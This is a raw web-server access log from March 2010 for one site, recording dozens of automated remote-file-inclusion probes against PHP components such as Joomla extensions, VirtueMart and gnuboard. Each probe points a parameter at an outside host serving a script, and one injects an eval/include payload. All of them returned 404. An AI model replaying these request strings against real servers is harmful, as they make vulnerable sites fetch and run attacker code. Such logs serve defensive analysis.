221.141.1.113 - - [06/Mar/2010:05:44:10 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
118.129.166.221 - - [06/Mar/2010:05:47:51 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.166.221 - - [06/Mar/2010:05:47:51 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.166.221 - - [06/Mar/2010:05:47:51 -0800] "GET /logs/access_100220.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.222.43 - - [06/Mar/2010:05:56:04 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.getyourselfahorse.com"
66.7.222.43 - - [06/Mar/2010:05:56:04 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:15 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.49.100.254 - - [06/Mar/2010:05:58:33 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
141.65.161.68 - - [06/Mar/2010:05:59:02 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Zscho.de Crawler/Nutch-1.0-Zscho.de-semantic_patch (Zscho.de Crawler, collecting for machine learning; http://zscho.de/ )" "www.getyourselfahorse.com"
141.65.161.68 - - [06/Mar/2010:05:59:02 -0800] "GET / HTTP/1.0" 200 899 "-" "Zscho.de Crawler/Nutch-1.0-Zscho.de-semantic_patch (Zscho.de Crawler, collecting for machine learning; http://zscho.de/ )" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:01:22 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:01:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:01:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:02:57 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:02:57 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:02:57 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:04:34 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:04:34 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:04:34 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:26 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:26 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:26 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:48 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:48 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:05:48 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:11:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:11:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
118.129.170.49 - - [06/Mar/2010:06:11:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:22:06 -0800] "GET /logs/access_100220.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:22:25 -0800] "GET /logs/access_100220.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:23:38 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:23:38 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:23:38 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:30:13 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:30:13 -0800] "GET /logs/access_100227.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:30:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:08 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:09 -0800] "GET /ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:09 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:18 -0800] "GET /ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:18 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
124.136.23.172 - - [06/Mar/2010:06:31:18 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:31:43 -0800] "GET /logs/errors.php?error=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:31:43 -0800] "GET /errors.php?error=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:31:43 -0800] "GET /logs/access_100227.log/errors.php?error=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:08 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:08 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:08 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:13 -0800] "GET /logs/access_100220.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:30 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:30 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:30 -0800] "GET /write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.200.203.11 - - [06/Mar/2010:06:32:35 -0800] "GET /logs/access_100220.log%20%20//write_comment_update.php?board_skin_path=http://www.kvsam.or.kr/gnuboard4/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:32:51 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:32:51 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.210.38.8 - - [06/Mar/2010:06:32:51 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:37:44 -0800] "GET /include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:37:44 -0800] "GET /logs/access_100220.log%20%20//include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:37:45 -0800] "GET /logs//include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:43:55 -0800] "GET /logs/access_100227.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:43:55 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:06:43:55 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:47:10 -0800] "GET /include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:47:10 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
216.119.103.12 - - [06/Mar/2010:06:47:10 -0800] "GET /logs//include/write.php?dir=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.60.28.10 - - [06/Mar/2010:06:51:58 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://cis.cjpc.ac.kr/data/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.60.28.10 - - [06/Mar/2010:06:51:58 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://cis.cjpc.ac.kr/data/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.60.28.10 - - [06/Mar/2010:06:51:58 -0800] "GET /logs/access_100109.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://cis.cjpc.ac.kr/data/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:55:41 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:55:41 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:55:41 -0800] "GET /logs/access_100220.log%20%20//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:57:25 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:57:25 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:06:57:25 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:01:36 -0800] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:02:04 -0800] "GET /logs/access.log//index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:02:04 -0800] "GET /logs//index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.143.143 - - [06/Mar/2010:07:07:24 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:07:46 -0800] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:08:13 -0800] "GET /logs/access.log//index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
219.94.193.152 - - [06/Mar/2010:07:08:13 -0800] "GET /logs//index.php?option=com_comprofiler&Itemid=&mosConfig.absolute.path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
222.237.78.176 - - [06/Mar/2010:07:08:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Mar/2010:07:08:14 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Mar/2010:07:08:16 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:16 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:16 -0800] "GET /logs/access_100227.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:29 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:09:30 -0800] "GET /logs/access_100227.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:07:10:04 -0800] "GET /errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:11:38 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:07:11:41 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:07:13:39 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:07:13:39 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:07:13:39 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:07:14:17 -0800] "GET /errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:07:17:39 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:07:17:39 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.29.80 - - [06/Mar/2010:07:17:42 -0800] "GET /logs/access_100227.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
208.98.1.242 - - [06/Mar/2010:07:18:14 -0800] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:07:27:23 -0800] "GET /write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:07:27:38 -0800] "GET /write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:07:27:38 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.140.23.24 - - [06/Mar/2010:07:27:43 -0800] "GET /logs/access_100220.log%20%20//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.111.95.42 - - [06/Mar/2010:07:28:16 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "getyourselfahorse.com"
193.111.95.42 - - [06/Mar/2010:07:28:17 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "getyourselfahorse.com"
193.111.95.42 - - [06/Mar/2010:07:28:17 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.getyourselfahorse.com"
193.111.95.42 - - [06/Mar/2010:07:28:17 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.getyourselfahorse.com"
